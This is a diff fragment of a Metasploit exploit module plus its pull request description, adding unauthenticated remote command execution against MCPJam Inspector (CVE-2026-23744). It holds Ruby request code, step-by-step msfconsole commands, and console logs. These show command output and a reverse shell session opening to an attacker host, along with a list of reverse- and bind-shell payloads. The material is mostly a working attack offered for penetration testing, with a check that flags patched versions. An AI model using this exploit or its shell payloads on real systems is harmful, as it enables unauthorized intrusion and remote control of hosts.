+  def execute_mcp_tool(id, cmd, names, fetch_output: datastore['FETCH_OUTPUT'])
     send_request_cgi(
       {
         'method' => 'POST',
@@ -170,10 +185,10 @@ rl.on('line',function(l){
         'ctype' => 'application/json',
         'data' => {
           'serverId' => id,
-          'toolName' => 'exec',
+          'toolName' => names[:tool_name],
           'parameters' => {
-            'cmd' => cmd,
-            'fetch_output' => fetch_output
+            names[:command_key] => cmd,
+            names[:fetch_output_key] => fetch_output
           }
         }.to_json
       },
@@ -222,12 +237,13 @@ rl.on('line',function(l){
 
     id = random_server_id('check')
     marker = Rex::Text.rand_text_alphanumeric(12)
-    res = start_mcp_tool_server(id, fetch_output: true)
+    names = mcp_tool_names
+    res = start_mcp_tool_server(id, names, fetch_output: true)
     unless res&.code == 200
       return CheckCode::Detected('MCPJam Inspector connect endpoint is reachable, but command execution could not be confirmed')
     end
 
-    res = execute_mcp_tool(id, "printf #{marker}", fetch_output: true)
+    res = execute_mcp_tool(id, "printf #{marker}", names, fetch_output: true)
     return CheckCode::Detected('MCPJam Inspector command execution could not be confirmed') unless res&.code == 200
 
     output = res.get_json_document.dig('result', 'content', 0, 'text').to_s
@@ -273,7 +289,8 @@ rl.on('line',function(l){
   end
 
   def execute_via_mcp_tool(cmd, id)
-    res = start_mcp_tool_server(id)
+    names = mcp_tool_names
+    res = start_mcp_tool_server(id, names)
 
     fail_with(Failure::Unreachable, 'No HTTP response received while starting MCP command server') unless res
     unless res.code == 200
@@ -283,7 +300,7 @@ rl.on('line',function(l){
     print_good('MCP command server connected')
     print_status('Executing payload through MCP tools/execute')
 
-    res = execute_mcp_tool(id, cmd)
+    res = execute_mcp_tool(id, cmd, names)
 
     if res.nil?
       print_status('No HTTP response received after tool execution')


### PR DESCRIPTION
## Description

This PR adds a new exploit module for CVE-2026-23744, an unauthenticated command execution vulnerability in MCPJam Inspector.

The module targets the `/api/mcp/connect` endpoint. Vulnerable versions accept a JSON `serverConfig` object containing a `command` and `args` array, then use those values to start an MCP server. When MCPJam Inspector is exposed on a routable interface, an unauthenticated remote attacker can abuse this behavior to execute operating system commands as the user running MCPJam Inspector.

The module currently supports Unix command payloads. By default, it starts a transient stdio MCP server and executes the selected Metasploit command payload through MCPJam Inspector's MCP tools API. A direct `/bin/sh -c` execution path is also available with `EXEC_METHOD=direct_sh`.

This change also adds module documentation under `documentation/modules`.

During testing, the GitHub Security Advisory's affected range appeared to be narrower than observed behavior. The advisory lists affected versions as <= 1.4.2, but source builds through v1.4.6 were exploitable. The first fixed GitHub tag identified during testing was v1.5.0, which requires session-token authentication for the relevant API endpoints.

**Related Issue:** N/A

## Breaking Changes

None

## Reviewer Notes

Start with:
- `modules/exploits/multi/http/mcpjam_inspector_rce.rb`
- `documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md`

The module intentionally targets Unix command payloads only. Windows support is left out of scope for this initial PR because it was not tested against a Windows MCPJam Inspector deployment.

The `check` method performs the following:
1. Verifies that the target appears to be MCPJam Inspector.
2. Probes the connect endpoint.
3. Reports patched/authenticated versions as not exploitable when the endpoint returns an authentication response such as `Unauthorized`/`Session token required`.
4. On vulnerable versions, starts a transient MCP server and verifies benign command execution with a random marker.

## Verification Steps

1. - [ ] Build or run a vulnerable MCPJam Inspector version, such as GitHub tag v1.4.2, and expose it locally on port 6274.
2. - [ ] Start `msfconsole` and load the module:
```
use exploit/multi/http/mcpjam_inspector_rce
set RHOSTS 127.0.0.1
set RPORT 6274
set SSL false
```
3. - [ ] Run `check` and verify that the target is reported vulnerable:
```
check
```
Expected result:
```
The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
```
4. - [ ] Test command output with `cmd/unix/generic`:
```
set payload cmd/unix/generic
set FETCH_OUTPUT true
set CMD id
run
```
Expected result: The module executes `id` and prints command output from the target.

5. - [ ] Test a reverse shell payload:
```
set FETCH_OUTPUT false
set payload cmd/unix/reverse_nodejs
set LHOST <attacker_ip>
set LPORT 9001
run
```
Expected result: A command shell session opens.

6. - [ ] Run MCPJam Inspector v1.5.0 or a later fixed version and repeat `check`.
Expected result:
```
The target is not exploitable. MCPJam Inspector requires session-token authentication for the connect endpoint
```
7. - [ ] Run module quality checks:
```
bundle exec ruby tools/dev/msftidy.rb modules/exploits/multi/http/mcpjam_inspector_rce.rb
bundle exec ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
ruby -c modules/exploits/multi/http/mcpjam_inspector_rce.rb
git diff --check
```

## Test Evidence

The module was tested against MCPJam Inspector versions built from GitHub source:

| Version | Result |
|-|-|
| v1.4.1 | Vulnerable |
| v1.4.2 | Vulnerable |
| v1.4.3 | Vulnerable |
| v1.4.4 | Vulnerable |
| v1.4.5 | Vulnerable |
| v1.4.6 | Vulnerable |
| v1.5.0 | Not vulnerable; session-token authentication required |
| v2.23.0 | Not vulnerable; session-token authentication required |

Successful payload coverage included:
• `cmd/unix/generic`
• `cmd/unix/reverse_nodejs`
• `cmd/unix/reverse_bash`
• `cmd/unix/reverse_perl`
• `cmd/unix/reverse_python`
• `cmd/unix/reverse_netcat`
• `cmd/unix/bind_nodejs`
• `cmd/unix/python/pingback_reverse_tcp`
• `cmd/unix/python/shell_reverse_tcp`

Example vulnerable target check:
```
msf6 > use exploit/multi/http/mcpjam_inspector_rce
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/http/mcpjam_inspector_rce) > set RHOSTS 192.0.2.10
RHOSTS => 192.0.2.10
msf6 exploit(multi/http/mcpjam_inspector_rce) > set RPORT 6274
RPORT => 6274
msf6 exploit(multi/http/mcpjam_inspector_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/mcpjam_inspector_rce) > check
[*] Starting transient Node.js MCP command server as server ID check-XXXXXXXX
[+] 192.0.2.10:6274 - The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
```

Example command execution:
```
msf6 exploit(multi/http/mcpjam_inspector_rce) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_OUTPUT true
FETCH_OUTPUT => true
msf6 exploit(multi/http/mcpjam_inspector_rce) > set CMD id
CMD => id
msf6 exploit(multi/http/mcpjam_inspector_rce) > run
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Starting transient Node.js MCP command server as server ID check-XXXXXXXX
[+] The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
[*] Starting transient Node.js MCP command server as server ID msf-XXXXXXXX
[+] MCP command server connected
[*] Executing payload through MCP tools/execute
[*] Command result: uid=1000(appuser) gid=1000(appuser) groups=1000(appuser)
[*] Exploit completed, but no session was created.
```

Example reverse shell:
```
msf6 exploit(multi/http/mcpjam_inspector_rce) > set FETCH_OUTPUT false
FETCH_OUTPUT => false
msf6 exploit(multi/http/mcpjam_inspector_rce) > set payload cmd/unix/reverse_nodejs
payload => cmd/unix/reverse_nodejs
msf6 exploit(multi/http/mcpjam_inspector_rce) > set LHOST 192.0.2.20
LHOST => 192.0.2.20
msf6 exploit(multi/http/mcpjam_inspector_rce) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/http/mcpjam_inspector_rce) > run
[*] Started reverse TCP handler on 192.0.2.20:9001
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Starting transient Node.js MCP command server as server ID check-XXXXXXXX
[+] The target is vulnerable. MCPJam Inspector executed a benign command through the unauthenticated connect endpoint
[*] Starting transient Node.js MCP command server as server ID msf-XXXXXXXX
[+] MCP command server connected
[*] Executing payload through MCP tools/execute
[*] Command shell session 1 opened (192.0.2.20:9001 -> 192.0.2.10:51234)
```

Example fixed-version check against v1.5.0:
```
msf6 exploit(multi/http/mcpjam_inspector_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/mcpjam_inspector_rce) > set RPORT 6274
RPORT => 6274
msf6 exploit(multi/http/mcpjam_inspector_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/mcpjam_inspector_rce) > check
[*] 127.0.0.1:6274 - The target is not exploitable. MCPJam Inspector requires session-token authentication for the connect endpoint
```

Quality checks:
```
$ bundle exec ruby tools/dev/msftidy.rb modules/exploits/multi/http/mcpjam_inspector_rce.rb
1 file inspected, no offenses detected
$ bundle exec ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/mcpjam_inspector_rce.md
$ ruby -c modules/exploits/multi/http/mcpjam_inspector_rce.rb
Syntax OK
$ git diff --check
```

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Kali Linux, Linux 6.19.14+kali-amd64 |
| **Target Software/Hardware** | MCPJam Inspector v1.4.1 through v1.4.6 vulnerable; v1.5.0 and v2.23.0 not vulnerable to this unauthenticated exploit path. Target versions were built from the MCPJam Inspector GitHub source repository with Node.js v22.13.1. |

## AI Usage Disclosure

AI assistance was used during development and testing. Hermes Agent was used to assist with module and documentation drafting and test orchestration. All code and documentation were manually reviewed/tested.

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules`
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Included RSpec tests for library changes (N/A -- no `lib/` changes)
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)